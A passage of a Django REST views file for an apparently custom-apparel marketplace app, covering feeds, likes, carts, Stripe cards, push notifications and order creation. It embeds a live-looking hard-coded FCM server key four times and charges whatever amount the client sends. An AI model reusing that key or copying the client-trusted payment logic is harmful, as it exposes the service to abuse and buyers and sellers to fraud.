            follower = FollowUser.objects.select_related('follow_to').filter(follow_by_id = user_id)
            if follower:
                followserializer_data = FollowUserSerializer(follower, many=True).data
                for data in followserializer_data:
                    obj = User.objects.get(id=data['follow_to'])
                    data['fullname'] = obj.fullname
                    data['image'] = obj.image
                    data['user_name'] = obj.user_name
                    # Does the caller themselves follow this user?
                    following = FollowUser.objects.filter(follow_by_id=user.id, follow_to_id=data['follow_to'])
                    data["follow_status"] = True if following else False
                return Response({"data": followserializer_data}, status=status.HTTP_200_OK)
            else:
                return Response({"data" : []}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================================
#get User home page
#======================================================
@AppVersion_required
@api_view(['GET'])
def getHomePage(request):
    """Return the paginated home feed: 20 active posts per page, newest first.

    Anonymous callers get the feed with like/favourite flags forced False and
    a zero cart count. Authenticated callers ('User' group) get their own
    posts excluded, real per-post like/favourite flags, their cart count,
    login type and saved bank detail (empty dict when none).
    ?page_num=N selects the page; an invalid page yields {"data": []}.
    """
    try:
        with transaction.atomic():
            if request.META.get('HTTP_AUTHORIZATION') == None:
                # ---------- anonymous feed ----------
                bnk_detail = {}
                page_num = request.GET['page_num']
                post = Post.objects.filter(post_status=1).order_by('-created_time')
                paginator = Paginator(post, 20)
                try:
                    post = paginator.page(page_num)
                except:
                    post = None
                if post is not None:
                    post_data = PostSerializer(post, many=True).data
                    for data in post_data:
                        data['post_like'] = False
                        data['post_fav'] = False
                        obj = User.objects.get(id=data['user'])
                        postimages = PostImage.objects.values('post_images').filter(post_id=data['id'])
                        data['post_image'] = [i['post_images'] for i in postimages]
                        data['fullname'] = obj.fullname
                        data['image'] = obj.image
                    return Response({"message" :"success",'has_next': post.has_next(),"cart_count": 0,"data":post_data,"bank_detail":bnk_detail}, status=status.HTTP_200_OK)
                else:
                    return Response({"data": []}, status=status.HTTP_200_OK)
            else:
                # ---------- authenticated feed ----------
                try:
                    API_key = request.META.get('HTTP_AUTHORIZATION')
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                    if not user.groups.filter(name='User').exists():
                        return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                except:
                    return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
                # Saved bank detail, or an empty dict when the user has none.
                try:
                    bnkdetail = BankDetail.objects.filter(user_id=user.id)
                    bnk_detail = BankDetailSerializer(bnkdetail, many=True).data[0] if bnkdetail else {}
                except:
                    bnk_detail = {}
                page_num = request.GET['page_num']
                post = Post.objects.filter(post_status=1).exclude(user_id = user.id).order_by('-created_time')
                paginator = Paginator(post, 20)
                try:
                    post = paginator.page(page_num)
                except:
                    post = None
                if post is not None:
                    # BUG FIX: re-read the caller ONCE for the cart count.
                    # Previously this ran inside the loop (one query per post)
                    # and was unbound for an empty page, raising NameError.
                    obj2 = User.objects.get(id=user.id)
                    post_data = PostSerializer(post, many=True).data
                    for data in post_data:
                        data['post_like'] = PostLike.objects.filter(user_id=user.id, post_id=data['id']).exists()
                        data['post_fav'] = Favourite.objects.filter(user_id=user.id, post_id=data['id']).exists()
                        obj = User.objects.get(id=data['user'])
                        postimages = PostImage.objects.values('post_images').filter(post_id=data['id'])
                        data['post_image'] = [i['post_images'] for i in postimages]
                        data['fullname'] = obj.fullname
                        data['image'] = obj.image
                    return Response({"message" :"success",'has_next': post.has_next(),"data":post_data,"cart_count":obj2.cartNo, "login_type":user.login_type,"bank_detail":bnk_detail}, status=status.HTTP_200_OK)
                else:
                    return Response({"data": []}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#================================================
# Set user On Off notification
#=================================================
@AppVersion_required
@api_view(['POST'])
def SetOnOffNotification(request):
    """Toggle the caller's push-notification flag.

    POST body 'notificationStatus': non-zero -> on, 0 -> off. Echoes the
    stored status back as an int. Returns 401 on bad token/group and 500 when
    the update matches no row or anything else fails.
    """
    try:
        with transaction.atomic():
            try:
                received_json_data = json.loads(request.body, strict=False)
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            onoffnotification = received_json_data['notificationStatus']
            notificationUpdate = User.objects.filter(id=user.id).update(onoffnotification=onoffnotification)
            if notificationUpdate:
                message = "Notification successfully on" if int(onoffnotification) else "Notification successfully off"
                return Response({"message": message, "status": "1",
                                 "notificationStatus": int(onoffnotification)}, status=status.HTTP_200_OK)
            else:
                return Response({"message": errorMessage, "status": "0"},
                                status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        # Log instead of silently swallowing, matching the file's other handlers.
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=======================================================
# method to send notification for like/dislike
#======================================================
def SendNotification(senderId, receiverId, title, message, tag, table_id):
    """Push an FCM notification (like/dislike etc.) to *receiverId*'s device.

    The data payload carries the title, body, the related post/table id and
    the tag. Returns False on any failure; the success path returns None and
    callers ignore the result.
    """
    try:
        # SECURITY: hard-coded FCM server key — should be moved to settings/env.
        push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
        receiver = User.objects.get(id=receiverId)
        registration_ids_ios = [receiver.deviceId]
        if len(registration_ids_ios) > 0:
            data_message = {
                "message_title": title,
                "message_body": message,
                "post_id": table_id,
                "tag": tag,
            }
            push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title, sound="default", message_body=message, data_message=data_message)
    except Exception:
        return False
#===================================
# send notification order place
#===================================
def SendOrderNotification(senderId, receiverId, title, message, tag, order_id):
    """Push an FCM 'order placed' notification to *receiverId*'s device.

    The data payload carries the title, body, the order id and the tag.
    Returns False on any failure; the success path returns None and callers
    ignore the result.
    """
    try:
        # SECURITY: hard-coded FCM server key — should be moved to settings/env.
        push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
        receiver = User.objects.get(id=receiverId)
        registration_ids_ios = [receiver.deviceId]
        if len(registration_ids_ios) > 0:
            data_message = {
                "message_title": title,
                "message_body": message,
                "order_id": order_id,
                "tag": tag,
            }
            push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title, sound="default", message_body=message, data_message=data_message)
    except Exception:
        return False
#=======================================
# send notification for chat
#=========================================
def SendChatNotification(sender_id,sender_name,sender_image,receiver_id,receiver_fullname,receiver_image,created_time,message,title):
    """Push an FCM chat-message notification to *receiver_id*'s device.

    Returns True when FCM reported a result, False on any failure (unknown
    receiver, FCM error, encoding error). sender_image, receiver_image and
    created_time are accepted but not forwarded in the payload.
    """
    try:
        # NOTE(review): hard-coded FCM server key — should live in settings/env.
        push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
        idsArray_ios = []
        print(receiver_id,"iid")
        receiver = User.objects.get(id=receiver_id)
        idsArray_ios.append(receiver.deviceId)
        registration_ids_ios = idsArray_ios
        # Round-trip the text through latin-1 -> raw_unicode_escape -> utf-16
        # with surrogatepass — presumably to repair mojibake and preserve emoji
        # surrogate pairs in the stored message. TODO confirm against the chat
        # write path before touching this.
        message = message.encode("latin_1")
        print(message)
        message_body = (message.decode("raw_unicode_escape").encode('utf-16', 'surrogatepass').decode('utf-16'))
        print(message_body)
        if idsArray_ios.__len__() > 0:
            data_message = {
                "message_title": title,
                "message_body": message_body,
                "sender_id": sender_id,
                "sender_name": sender_name,
                "receiver_id": receiver_id,
                "receiver_name": receiver_fullname,
                "tag":"message",
            }
            result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title,sound="default",message_body=message_body, data_message=data_message)
            if result is not None:
                return True
            else:
                return False
    except Exception as e:
        return False
#=============================================
# method for accept notification
#=============================================
def SendAcceptOrderNotification(order_id, title, tag, sender_id, receiver_id):
    """Push an FCM 'order accepted' notification to *receiver_id*'s device.

    The data payload carries both party ids, the order id and the tag; the
    visible body is the fixed text "Accepted your Order". Returns True when
    FCM reported a result, False otherwise.
    """
    try:
        # SECURITY: hard-coded FCM server key — should be moved to settings/env.
        push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
        receiver = User.objects.get(id=receiver_id)
        registration_ids_ios = [receiver.deviceId]
        if len(registration_ids_ios) > 0:
            data_message = {
                "message_title": title,
                "message_body": "Accepted your Order",
                "sender_id": sender_id,
                "receiver_id": receiver_id,
                "tag": tag,
                "order_id": order_id
            }
            result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title, sound="default", message_body="Accepted your Order", data_message=data_message)
            return result is not None
    except Exception:
        return False
#==================================
#likedislike
#=================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def LikedislikePost(request):
    """Like ('like_status' == 1) or unlike (== 0) the active post 'post_id'.

    Maintains the post's denormalized total_likes counter and, when the liker
    is not the owner and the owner allows notifications, records a
    Notification row and attempts an FCM push. A missing or admin-disabled
    post surfaces as a 500 "disabled by admin" response (the DoesNotExist
    falls through to the outer handler, which deliberately reuses that text).
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=api_key)
                user = token1.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            post_id = received_json_data['post_id']
            like_status = int(received_json_data['like_status'])
            # Raises DoesNotExist for missing/disabled posts -> outer except.
            post = Post.objects.get(id=post_id, post_status=1)
            nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
            if like_status == 1:
                post_like = PostLike.objects.filter(user_id=user.id, post_id=post.id)
                if not post_like.exists():
                    PostLike.objects.create(user_id=user.id, post_id=post.id)
                    Post.objects.filter(id=post.id).update(total_likes=post.total_likes + 1)
                    owner = post.user
                    # Notify the owner unless they liked their own post.
                    if user.id != post.user_id and owner.onoffnotification == 1:
                        Notification.objects.create(id=uuid.uuid1(),
                                                    receiver_id=post.user_id,
                                                    sender_id=user.id,
                                                    message="liked your post",
                                                    tag="like",
                                                    notification_time=nowTime,
                                                    table_id=post.id)
                        try:
                            # Only push when the owner has a live session token.
                            Token.objects.get(user_id=post.user_id)
                            SendNotification(user.id, post.user_id, "notification", str(user.fullname) + " liked your post", "like", str(post.id))
                        except:
                            pass
                    # BUG FIX: previously, liking another user's post whose
                    # notifications were off fell through without a Response
                    # (also removed a leftover debug print here).
                    return Response({'message': PostLikedMessage}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": "Post already liked"},
                                    status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            elif like_status == 0:
                post_dislike = PostLike.objects.filter(user_id=user.id, post_id=post.id)
                if post_dislike.exists():
                    post_dislike.delete()
                    Post.objects.filter(id=post.id).update(total_likes=post.total_likes - 1)
                    return Response({"status": "1", 'message': PostDislikedMessage},
                                    status=status.HTTP_200_OK)
                else:
                    return Response({"message": "Already not liked "},
                                    status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                return Response({"message": "This post has been disabled by admin"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : "This post has been disabled by admin"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#================================================
# Add post into cart
#================================================
@AppVersion_required
@api_view(['POST'])
def AddToCart(request):
    """Add one post (with chosen image and size) to the caller's cart.

    POST body: post_id, image_id, size_id. Duplicate detection for 'custom'
    posts ignores the chosen image (same post + size is a duplicate); for all
    other posts the image must match too. Bumps the caller's denormalized
    cartNo counter on success and echoes the new count back. A missing or
    admin-disabled post (or image/size) yields the 500 "disabled by admin"
    response. (Removed an unreachable ``else: pass`` — Cart.objects.create
    always returns an instance.)
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            post_id = received_json_data['post_id']
            post_images = received_json_data['image_id']
            size_id = received_json_data['size_id']
            try:
                # Any lookup failure below maps to the 500 "disabled" response.
                post = Post.objects.get(id=post_id, post_status=1)
                post_image = PostImage.objects.get(post=post.id, id=post_images)
                sizes = Size.objects.get(id=size_id)
                if post.post_type == "custom":
                    # Custom posts: a duplicate is the same post+size, any image.
                    cart = Cart.objects.filter(post_id=post, user_id=user.id, size_id=sizes)
                else:
                    cart = Cart.objects.filter(post_id=post, user_id=user.id, size_id=sizes, post_images_id=post_image)
                if not cart.exists():
                    Cart.objects.create(
                        size_id=sizes.id,
                        user_id=user.id,
                        post_id=post.id,
                        post_images_id=post_image.id,
                        price=post.price,)
                    User.objects.filter(id=user.id).update(cartNo=user.cartNo + 1)
                    b = User.objects.get(id=user.id)
                    return Response({"message": addCartSuccessMessage, "status": "1", "cartCount": b.cartNo}, status=status.HTTP_200_OK)
                else:
                    c = User.objects.get(id=user.id)
                    return Response({"message": "Item is already in your cart","cartCount": c.cartNo},status=status.HTTP_200_OK)
            except:
                return Response({"message" : "This post has been disabled by admin"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==============================================
# Get posts from cart
#==============================================
@AppVersion_required
@api_view(['GET'])
def ShowCartPosts(request):
    """Return the caller's cart contents, newest first.

    Each cart row is annotated with the post's images, price, description,
    designer name, size name and printing sizes. When the cart is non-empty,
    the address of the caller's most recent order (if still active) is echoed
    back as the default shipping address, along with fixed service/shipping
    charges. Returns 401 on auth failure, 500 on any other error.
    """
    try:
        with transaction.atomic():
            # received_json_data = json.loads(request.body, strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            # Flat charges applied to every non-empty cart (units presumably
            # match post.price — TODO confirm).
            service_tax = 6.00
            shipping_cost = 4.99
            cart1 = Cart.objects.filter(user = user.id).order_by('-created_time')
            if cart1:
                cart1serializer = CartSerializer(cart1,many=True)
                cart_data = cart1serializer.data
                for data in cart_data:
                    post = Post.objects.get(id = data['post'])
                    if post.post_type=="custom":
                        # Custom posts: include every image attached to the post.
                        price = post.price
                        obj1 = Size.objects.get(id = data['size'])
                        # NOTE(review): obj2 is fetched but never used below.
                        obj2 = PostImage.objects.get(id = data['post_images'])
                        obj3 = PostImage.objects.filter(post_id=data['post'])
                        temp=[]
                        for i in obj3:
                            temp.append(i.post_images)
                        data['post_image'] = temp
                        data['colour_name'] = "Black"
                        data['post_description'] = post.post_description
                        data['price'] = str(price)
                        data['design_by'] = post.user.fullname
                        data['size_name'] = obj1.size
                        data['post_printing_size_front'] = post.post_printing_size_front
                        data['post_printing_size_back'] = post.post_printing_size_back
                    else:
                        # Non-custom posts: include only the image chosen in
                        # this cart row.
                        price = post.price
                        obj1 = Size.objects.get(id = data['size'])
                        # NOTE(review): obj2 is fetched but never used below.
                        obj2 = PostImage.objects.get(id = data['post_images'])
                        obj3 = PostImage.objects.filter(id = data['post_images'])
                        temp1=[]
                        for i in obj3:
                            temp1.append(i.post_images)
                        data['post_image'] = temp1
                        data['colour_name'] = "Black"
                        data['post_description'] = post.post_description
                        data['price'] = str(price)
                        data['design_by'] = post.user.fullname
                        data['size_name'] = obj1.size
                        data['post_printing_size_front'] = post.post_printing_size_front
                        data['post_printing_size_back'] = post.post_printing_size_back
                if cart_data:
                    # Default shipping address = address of the caller's most
                    # recent order, provided it is still active (status=1).
                    last_ad = OrderTrn.objects.filter(user_id = user.id).order_by('-transaction_time').first()
                    if last_ad:
                        add1 = Addresses.objects.filter(id = last_ad.address.id,status=1)
                        if add1:
                            add = Addresses.objects.filter(id = last_ad.address.id,status=1).values("id","first_name","last_name","phone","city","postal_code","address")
                            if add:
                                is_default = True
                            else:
                                is_default = False
                            return Response({"message" : "Items fetched successfully","data":cart_data,"address_name":add[0], "default_address":is_default,"serviceCharge":service_tax,"shippingCost":shipping_cost}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : "Items fetched successfully","data":cart_data, "address_name":{}, "default_address":False,"serviceCharge":service_tax,"shippingCost":shipping_cost}, status=status.HTTP_200_OK)
                    else:
                        return Response({"message" : "Items fetched successfully","data":cart_data, "address_name":{}, "default_address":False,"serviceCharge":service_tax,"shippingCost":shipping_cost}, status=status.HTTP_200_OK)
            else:
                return Response({"data": [], "address_name":{}, "default_address":False,"serviceCharge":0.00,"shippingCost":0.00}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=============================================================
# Delete post from cart
#=============================================================
@AppVersion_required
@api_view(['POST'])
def DeletePostFromCart(request):
    """Remove cart row 'cart_id' (must belong to the caller) and decrement the
    caller's denormalized cartNo counter.

    Returns 401 on auth failure; 500 when the row is missing, belongs to
    another user, or anything else fails.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                if not user.groups.filter(name='User').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                # BUG FIX: previously sent "status": jsonCards (an unrelated
                # name) instead of the "0" every other auth failure returns.
                return Response({"message": errorMessageUnauthorised, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            cart_id = request.data['cart_id']
            # Scoped to the caller so one user cannot delete another's row;
            # a miss raises DoesNotExist -> outer handler -> 500.
            cart = Cart.objects.get(id=cart_id, user_id=user.id)
            if cart:
                Cart.objects.filter(id=cart.id).delete()
                User.objects.filter(id=user.id).update(cartNo=user.cartNo - 1)
                return Response({"message": deleteSuccessMessage}, status=status.HTTP_200_OK)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
#Add Card
#======================================
def _stripe_card_image(brand):
    """Return the bundled static icon path for a Stripe card *brand* string.

    Unknown brands fall back to the JCB icon, matching historical behavior.
    """
    return {
        "MasterCard": '/static/images/ic_master.png',
        "Visa": '/static/images/ic_visa.png',
        "Diners Club": '/static/images/Diners-Club.png',
        "Discover": '/static/images/discover.png',
        "American Express": '/static/images/american_express.png',
    }.get(brand, '/static/images/jbc.png')


@AppVersion_required
@api_view(['POST'])
def AddCard(request):
    """Tokenize and attach a new payment card to the caller's Stripe customer.

    POST body: ``cardNumber``, ``expMonth``, ``expYear``, ``cvc``, ``name``.
    Creates the Stripe customer on first use (when ``user.stripe_id`` is
    empty) and stores its id on the User row. Returns the Stripe card JSON
    augmented with ``card_image`` and ``message``.

    Fixes: the existing-customer branch previously mapped MasterCard to the
    American Express icon; the two near-duplicate branches are merged; the
    Stripe error text is no longer split with a bare [1] index (which raised
    IndexError when the message had no colon).
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token1 = Token.objects.get(key=API_key)
                    user = token1.user
                except:
                    return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
                checkGroup = user.groups.filter(name='User').exists()
                if checkGroup:
                    stripe.api_key = settings.STRIPE_SECRET_KEY
                    cardNumber = request.data['cardNumber']
                    expMonth = request.data['expMonth']
                    expYear = request.data['expYear']
                    cvc = request.data["cvc"]
                    name = request.data["name"]
                    try:
                        tokenDetails = stripe.Token.create(
                            card={
                                "number": cardNumber,
                                "exp_month": expMonth,
                                "exp_year": expYear,
                                "cvc": cvc,
                                "name": name,
                            },
                        )
                        token_id = tokenDetails.id
                        if user.stripe_id == "":
                            # First card: create the Stripe customer and
                            # remember its id for future charges.
                            response = stripe.Customer.create(
                                description = "Customer_" +str(user.id),
                                email = str(user.email))
                            stripe_customer_id = response.id
                            User.objects.filter(id=user.id).update(stripe_id = stripe_customer_id)
                        else:
                            stripe_customer_id = user.stripe_id
                        cardDetails = stripe.Customer.create_source(stripe_customer_id, source=token_id)
                        cardJson = json.loads(str(cardDetails))
                        cardJson['card_image'] = _stripe_card_image(cardJson['brand'])
                        cardJson['message'] = addSuccessMessage
                        return Response(cardJson,status=status.HTTP_200_OK)
                    except Exception as e2:
                        # Surface only the text after the first colon of the
                        # Stripe error; fall back to the full message when
                        # there is no colon.
                        message2 = str(e2)
                        detail = message2.split(":", 1)[1] if ":" in message2 else message2
                        return Response({"message": detail, "status": "0"},
                                        status=status.HTTP_500_INTERNAL_SERVER_ERROR)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@AppVersion_required
@api_view(['GET'])
def Get_List_Cards(request):
    """List up to 4 saved cards on the caller's Stripe customer.

    Each Stripe card object is augmented with a ``card_image`` icon path.
    Returns 200 with a "no cards" message when the user has no stripe_id,
    401 for missing/invalid token or wrong group.

    Fixes: ``.exists`` was never called (a bound method is always truthy, so
    the group check was a no-op); MasterCard was mapped to the American
    Express icon; the local variable ``list`` shadowed the builtin.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    # BUG FIX: was `.exists` (missing call parentheses).
                    check_group = user.groups.filter(name='User').exists()
                except:
                    return Response({'message' : "Session expired! Please login again","status":"0"},status=status.HTTP_401_UNAUTHORIZED)
                if check_group:
                    stripe.api_key = settings.STRIPE_SECRET_KEY
                    if user.stripe_id:
                        try:
                            card_list = stripe.Customer.retrieve(user.stripe_id).sources.list(limit=4,
                                                                                              object='card')
                            cust_json = json.loads(str(card_list))
                            jsonCards = cust_json['data']
                            # Brand -> bundled icon path; unknown brands fall
                            # back to the JCB icon (historical default).
                            brand_images = {
                                "MasterCard": '/static/images/ic_master.png',
                                "Visa": '/static/images/ic_visa.png',
                                "Diners Club": '/static/images/Diners-Club.png',
                                "Discover": '/static/images/discover.png',
                                "American Express": '/static/images/american_express.png',
                            }
                            for key in jsonCards:
                                key['card_image'] = brand_images.get(key['brand'], '/static/images/jbc.png')
                            return Response({'message':'card list is here', 'cards' : jsonCards}, status=status.HTTP_200_OK)
                        except stripe.error.CardError as e:
                            return Response({"message": str(e), 'cards' : []}, status = status.HTTP_200_OK)
                    else:
                        return Response({"message": "Sorry you have no cards."}, status = status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            else:
                return Response({"message" : errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@AppVersion_required
@api_view(['POST'])
def DeleteCard(request):
    """Detach a saved card (POST body: ``card_id``) from the caller's Stripe
    customer.

    Returns 200 on success, 401 for missing/invalid auth or wrong group,
    500 when the user has no Stripe customer or Stripe rejects the delete.
    """
    try:
        with transaction.atomic():
            auth_key = request.META.get('HTTP_AUTHORIZATION')
            if auth_key is None:
                return Response({"message": errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            try:
                auth_token = Token.objects.get(key=auth_key)
                account = auth_token.user
                in_user_group = account.groups.filter(name='User').exists()
            except:
                return Response({"message": "Session expired!! please login again"},status=status.HTTP_401_UNAUTHORIZED)
            if not in_user_group:
                return Response({"message": errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
            profile = User.objects.get(id=account.id)
            stripe.api_key = settings.STRIPE_SECRET_KEY
            card_id = request.data["card_id"]
            if profile.stripe_id == "":
                return Response(
                    {'message': 'User has no cards yet or no stripe id attached.'},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            try:
                customer = stripe.Customer.retrieve(profile.stripe_id)
                customer.sources.retrieve(card_id).delete()
                return Response({'message': "Deleted successfully"},status=status.HTTP_200_OK)
            except Exception as e:
                return Response({"message": str(e)},
                                status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e1:
        print(traceback.format_exc())
        return Response({"message": str(e1)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==========================================================
#Payment and Order Creation
#==========================================================
from decimal import *
@AppVersion_required
@api_view(['POST'])
def OrderCreate(request):
    """Charge the caller's Stripe customer and convert their cart to an order.

    POST body: ``card`` (Stripe source id), ``amt`` (total in whole currency
    units), ``address_id`` (one of the caller's saved Addresses).
    On a succeeded charge: creates an OrderTrn, one OrderPost per cart row,
    notifies each distinct seller (DB Notification plus push when the seller
    has notifications on and an active token), then empties the cart and
    resets the cached cartNo counter.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    print("user", user.id)
                except:
                    return Response({'message' : "Session expired! Please login again","status":"0"},status=status.HTTP_401_UNAUTHORIZED)
                stripe.api_key = settings.STRIPE_SECRET_KEY
                li = []  # seller ids gathered while creating order lines
                card = request.data['card']
                am = request.data['amt']
                nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
                # Stripe expects the amount in the smallest currency unit.
                charge = stripe.Charge.create(
                amount= int(am)*100,
                currency='usd',
                source=card,
                customer= user.stripe_id
                )
                address_id = request.data['address_id']
                aa = Addresses.objects.get(user=user.id, id=address_id)
                customer_json = json.loads(str(charge))
                if customer_json['status'] == "succeeded":
                    TransactionId = customer_json['id']
                    order = OrderTrn.objects.create(total_amount = am,
                    transaction_id = TransactionId,
                    order_status = "PLACED",
                    address_id = aa.id,
                    user_id = user.id)
                    if order:
                        cartobjs = Cart.objects.filter(user_id=user.id)
                        if cartobjs:
                            for data in cartobjs:
                                # One OrderPost per cart line, starting PENDING.
                                ordpost = OrderPost.objects.create(
                                post_id = data.post_id,
                                size = data.size,
                                price = data.price,
                                order_status = ORDER_STATUS_PENDING,
                                post_images_id = data.post_images.id,
                                order_id = order.id,
                                user_id = user.id)
                                obj1 = Post.objects.get(id = ordpost.post_id)  # ordered post
                                obj2 = obj1.user_id  # seller id
                                li.append(obj2)
                            lii = list(dict.fromkeys(li))  # de-duplicate seller ids, keep order
                            print(li)
                            for e in lii:
                                obj3 = User.objects.get(id = e)  # seller account
                                obj4 = obj3.onoffnotification
                                if obj3.onoffnotification == 1:
                                    # NOTE(review): the notification references only the LAST
                                    # ordpost/obj1 created in the loop above — presumably meant
                                    # to be per-seller; confirm before changing.
                                    notificationObj = Notification.objects.create(id=uuid.uuid1(),
                                    receiver_id=e,
                                    notification_time = nowTime,
                                    sender_id=user.id,
                                    message= " has placed an order",
                                    tag = "order place",
                                    table_id = obj1.id,
                                    order_id = ordpost.id)
                                    # Push only when the seller is logged in somewhere.
                                    recv_status = Token.objects.filter(user_id=e).exists()
                                    if recv_status == True:
                                        nott = SendOrderNotification(user.id,e,"notification", str(user.fullname) + " has placed an order", "Order place" , str(ordpost.id))
                                    else:
                                        pass
                            # Empty the cart now that every line became an order.
                            cart = Cart.objects.filter(user_id=user.id).delete()
                            User.objects.filter(id = user.id).update(cartNo = 0)
                        else:
                            print("empty cart")
                            pass
                        Details={"paymentFrom":card,
                        "amountpaid": am,
